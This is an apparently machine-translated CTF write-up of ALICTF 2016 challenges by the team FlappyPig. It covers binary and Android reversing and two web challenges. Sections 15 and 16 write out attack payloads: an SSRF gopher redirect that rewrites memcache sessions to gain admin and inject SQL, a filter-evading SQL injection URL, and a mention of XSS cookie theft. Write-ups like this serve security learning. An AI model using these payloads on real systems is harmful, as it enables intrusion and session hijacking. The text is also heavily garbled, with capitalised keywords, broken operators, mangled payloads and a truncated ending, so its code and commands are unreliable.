ALICTF2016FlappyPigWriteUp (customs clearance policy of the winning team FlappyPig) (2)

ALICTF2016FlappyPigWriteUp (customs clearance policy of the winning team FlappyPig) (2) 9. uglycode

The address for calling the function is calculated in the following way, but a1 = 2, so you can manually calculate the jump address.

There are several pieces of code in the program that need to be different or decrypted:

Fromidaapi import *

Defdecrypt (start, end, xor_data ):

For I in range (start, end ):

A = get_byte (I)

Patch_byte (I, a ^ xor_data)

Decrypt (0x603440,0x603440 + 250, 0x49)

Decrypt (0x603740,0x603740 + 672, 0x7e)

Decrypt (0x603a00, 0x603a00 + 0x1fd, 0xef)

The last four digits are uncertain. md5 is used for brute-force cracking.

F = '35faf651b1a72022e8ddfed1caf7c45f'

Defmd5 (src ):

M2 = hashlib. md5 ()

M2.update (src)

Return m2.hexdigest ()

For i1 inrange (0x20, 0x80 ):

For i2 in range (0x20, 0x80 ):

For i3 in range (0x20, 0x80 ):

For i4 in range (0x20, 0x80 ):

F2 = 'M' + chr (i1) + chr (i2) + chr (i3) + chr (i4) + 'a1w4ys _ h3re'

If md5 (f2) = f:

Print f2

Break

Flag: alictf {Pr0bl3M_1s_A1w4ys_H3re}

10. debug

Dual-process protection, first look at the parent process, relatively simple

When the subroutine stops, modify the memory.

After you manually patch the program, you can debug the child process.

The analysis algorithm finds that a tea encryption is performed, and then a 0x31 is exclusive, and then compared with a fixed string.

The tea here is different from the standard tea, mainly in rounds, from 32 to 128. the decryption program can be decrypted by slightly modifying tea.

From zioimport *

F = open ('./debug', 'RB ')

D = f. read () [0x7030: 0x7030 + 0x10]

D2 =''

For I inrange (0x10 ):

D2 + = chr (ord (d [I]) ^ 0x31)

PrintHEX (d2)

#5dff17ed14f787e92842a1dc0a97f732

# Include

Voiddecrypt (unsigned long * v, unsigned long * k ){

Unsignedlong y = v [0], z = v [1], sum = 0xC6EF3720, I;/* set up */

Sum = 0x1bbsp_80;

Unsignedlong delta = 0x9e3779b9;/* a key schedule constant */

Unsignedlong a = k [0], B = k [1], c = k [2], d = k [3];/* cache key */

For (I = 0; I <128; I ++)

{/* Basic cycle start */

Z-= (y <4) + c) ^ (y + sum) ^ (y> 5) + d );

Y-= (z <4) + a) ^ (z + sum) ^ (z> 5) + B );

Sum-= delta;/* end cycle */

}

V [0] = y;

V [1] = z;

}

Voidmain ()

{

Unsigned long plain2 [2] = {0xed17ff5d, 0xe987f714 };

Decrypt (plain2, key );

Printf ("% 08x % 08x", plain2 [0], plain2 [1]);

Unsigned long plain3 [2] = {0xdca14228, 0x32f7970a };

Decrypt (plain3, key );

Printf ("% 08x % 08x \ n", plain3 [0], plain3 [1]);

}

Flag: c6bf3d7cdad82ea712cea62cccbafddf

11. timer

There seems to be nothing in this question lib. to call the stringfromjn2function, you only need to input the correct number to play the flag. if it is cracked, the success rate is not high. So the focus is to find the correct number.

The main logic is as follows:

After a brief look, we can conclude that the above code does not run once in a second, and this. beg provides a timeout of 200000 seconds. For example

That is to say, as long as the application runs continuously for 200000 seconds, the flag may appear...

Of course, if you run it directly, it is estimated that the score will be lost. Analyze the above logic to get the following python code.

The is_prime code is

Directly copied from the apk and changed it. The final result is k 1616384, which is passed to stringfromjn2.

When passing parameters, the hook method can be considered first. However, if there was no suitable mobile phone at the time, the method should be switched back and the smali code should be directly modified to be repackaged for running.

Use Andoird killer to open the apk. first, modify MainActivity. smali to make the default value of k 1616384.

Then modify the MainActivity $1. smali two places. the first place is to modify, judge, and debug the program to directly execute stringfromjmi, and the second place to comment out the time update so that the code runs only once.

Finally, install the apk and run it. I changed the background to white, or else I could not see clearly.

12. LoopAndLoop

The main logic of this question is as follows. you only need to enter the correct number to obtain the flag.

Take a look at the check function in lib. the main logic is as follows: the check function in lib will call the check1, check2, and check3 functions in the java layer cyclically. Note that the _ JNIEnv: CallIntMethod actually called here has five parameters. ida does not fully list three parameters, 4th parameters are the 1st parameters passed in the check function, and 5th parameters are the 2nd parameters passed in the check function minus 1 (not the parameter itself !!)

The check functions in the Java layer are simple cyclic addition and subtraction and translated into python, such

The final output is the correct number 236492408 (I know that the arithmetic difference series can be summed directly, but I am lazy). input the apk to get the flag.

13. Steady

This is a pure Native apk application. for the relevant principles, refer:

Http://www.cnblogs.com/hicjiajia/archive/2011/01/20/1940022.html

This question is confused by ollvm, which is determined by the while loop and keyword.

This question is probably a game. when the apk is running, it will detect the angle of the mobile phone, and then output the corresponding result in the adb log when the angle is changed, and the screen will change color, if the angle is correct, the screen turns green.

After studying the code, it is found that the_process function will be passed in from three angles of the screen, and the return value of the_process function will be compared with another array. the key code is shown in the following three figures.

Considering that the three angles are the only input variables, and the return value of a_process is the only variable affected by the angle, we should modify the return value of a_process to forge the input. Change the return value of a_process to the value in the array in sequence to run the flag code.

However, the flag output is garbled, for other reasons.

By studying the_process function, we find that the maximum value that can be returned is 6, while 7 and 9 appear in the array.

Continue to study the code and find that the running result of B _process is added to the running result of a_process.

At the same time, it is found that only when a_process returns 6 will B _process be executed, as shown in

So when we need to modify it to 7 and 9, we need to change the return value of a_process to 6, modify the return values of B _process to 1 and 3, respectively, and finally obtain that the flag is alictf {PvrNa7iv3Ap6}

14. ColorOverFlow

Traffic package, capture apk

#! /Usr/bin/env python

From scapy import *

From scapy. all import *

Import io

Import struct

Import sys

B = io. BytesIO ()

Rawpcap = rdpcap (sys. argv [1])

Rawpcap = [_ for _ in rawpcapifTCP in _ and _ [TCP]. dport = 5555and _ [IP]. src = "10.0.2.2" and Rawin _ [IP]

Rawpcap = next (rawpcap [I + 1:] for I, p in enumerate (rawpcap) ifRaw indium andp [Raw]. load. find ('/data/local/tmp ')! =-1 andp [Raw]. load. find ('send ')! =-1)

Rawpcap = next (rawpcap [: I] for I, p in enumerate (rawpcap) ifRaw indium andp [Raw]. load. find ('PM \ 'Install \'')! =-1)

Print (len (rawpcap ))

# B. write (''. join ([p [Raw]. load [24:] for p inrawpcap if Raw in p])

For p in rawpcap:

If Rawin p:

Data = p [Raw]. load

If data. startswith ('wrte '):

Data = data [24:]

B. write (data)

B. seek (0)

# Print B. read ()

A = open('out.apk ', 'WB ')

Header = B. read (8)

While header! = "":

Tag, datalen = struct. unpack ('<4si', header)

If tag = "DATA ":

A. write (B. read (datalen ))

Else:

Break

Header = B. read (8)

A. c lose ()

The inverse algorithm, aes and md5, is written as a py to restore as follows:

Import hashlib

From Crypto. Cipher import AES

Def hex2bytes (s ):

R = s. decode ("hex ")

A = []

For I in r:

A. append (ord (I ))

Return

Def fix (a, B ):

V0 = 0

V8 = 8

V2 = []

V3 = []

For I in range (len ()):

V2.append (0)

For I in range (v8 ):

V3.append (0)

For v1 in range (0, v8 ):

V3 [7-v1] = 255 & B

B = B> v8

While v0

V2 [v0] = ord (chr (a [v0] ^ v3 [v0% 8])

V0 + = 1

Return v2

Def pre (arg6 ):

A = []

For I in range (0, len (arg6), 2 ):

A. append (int (arg6 [I] + arg6 [I + 1], 16 ))

Return

Def showlist ():

For I in:

If I> = 128:

Print i-256,

Else:

Print I,

Print ""

AndroidId = "bb39b07060deabd5"

Time stamp = 1463149196345

Iv = fix (hex2bytes ("201714bf9f2b3cd3bf580b7cd9bae4514"), timestamp)

Showlist (iv)

EncryptedData = hex2bytes ("DA2990BF15B7FD98A4E73EF766CD714F6F63B2E7F270C55F0CAF7E704CA7702F ")

Showlist (encryptedData)

Temp = hashlib. md5 (androidId). hexdigest ()

Key = pre (temp)

Showlist (key)

Content1 = ""

Key1 = ""

Iv1 = ""

For I in encryptedData:

Content1 = content1 + chr (I)

For I in key:

Key1 = key1 + chr (I)

For I in iv:

Iv1 = iv1 + chr (I)

Obj = AES. new (key1, AES. MODE_CBC, iv1)

Print obj. decrypt (content1)

15. Recruitment (II)

There are many articles on Wooyun:

Http://drops.wooyun.org/tips/16357

Http://drops.wooyun.org/papers/13948

Http://drops.wooyun.org/papers/8261

First, set up an environment to test ssrf. First, let's take a look at the VPS. when the vulnerability is in the place where the photo URL is submitted, an error will occur when a suffix is assigned. modify the Apache configuration file so that the jpg suffix can also be run in php:

Just add a jpg file.

Xxxxx.jpg, test:

Submit url:

The test is successful.

Failed to rebound sh, failed to test various intranet protocols, and found the running memcache on the local port 11211, limited local access, and set this in visual testing.

After ssrf accesses memcache, the Echo will be displayed on the index. php Image. download the image to view it.

Use the version command to obtain the version information: VERSION1.4.14 (Ubuntu)

Use stat items to get the items with four IDs:

Then you need to get the content:

Then:

Header ('Location: gopher: // 127.0.0.1: 11211/_ get % 20123123. lock % 0 aget % percent % 0 aget % percent % 0 aget % percent % 0 aget % percent % 0 aget % 20b27dfchc0lbkvdhv6s4qutt1t6% 0 aget % percent % 0 aget % percent. lock % 0 aget % 20hos82c41uh5c5vcbsoorv7cv47. lock % 0 aget % 20e6lbcsnd1jqlkcdlpksdqa5653. lock % 0 aget % 20tv2b4vad0ea9itqkk3h5a35lg2. lock % 0 aget % percent % 0 aget % percent % 0 aget % percent % 0 aget % percent % 0 aget % percent % 0 aget % 20hos82c41uh5c5vcbsoorv7cv47% 0 aget % percent % 0 aquit % 0a ');

?>

The session is found here. Modify is_admin by using the set command, change is_admin to 1, and log on to admin.

Command sequence to be executed:

Generate jpg:

Log on to/admin and find memo. modify the ip address in the session to 127.0.0.1, and then send an http request through gopher to access memo. php, but still prompts non-local user, this time found backup. php: the source code of the entire site is accessed. comments of backup files, downloads, audits, and waf are found to be strictly filtered, but the session is not filtered. you can modify the session through ssrf + memecache.

Use unionselect injection, test as 7 columns, construct payload, modify session, access index. php, and obtain flag (provided in source code of library table name ):

Header ('Location: gopher: // 127.0.0.1: 11211/_ set % lifecycle % 200% 200% 20177% 0d % 0agtserver | I: 1; captcha_id | s: 11: "captcha_110 "; is_login | B: 1; is_admin | B: 1; user_ip | s: 14: "218.29.102.114"; username | s: 61: "dfah \ '% 20 union % 20 select % 201, content, 7% 20 from % 20 memo % 20 where % 20 \ '1 \ '= \ '1 "; % 0d % 0 aquit % 0d % 0a ');

?>

16. Findpass

Registered account found a message board

Then I tried the xss at the user name.

The cookie is received early in the morning.

A wave of ideas

Then we found that HHHH can overwrite registration.

Http: // maid: 4458/detail. php? User_name = HHHH

User_name injection, construct payload according to xss

Payload:

Http: // maid: 4458/detail. php? User_name = HHHH % 27% 0 aununionion % 0 aselselectect % 0auser_pass, 4%, 4% 0 afrfromom % 0atest. users % 0 aununionion % 0 aselselectect % 0a1, 271, 0 aoorr % 0a %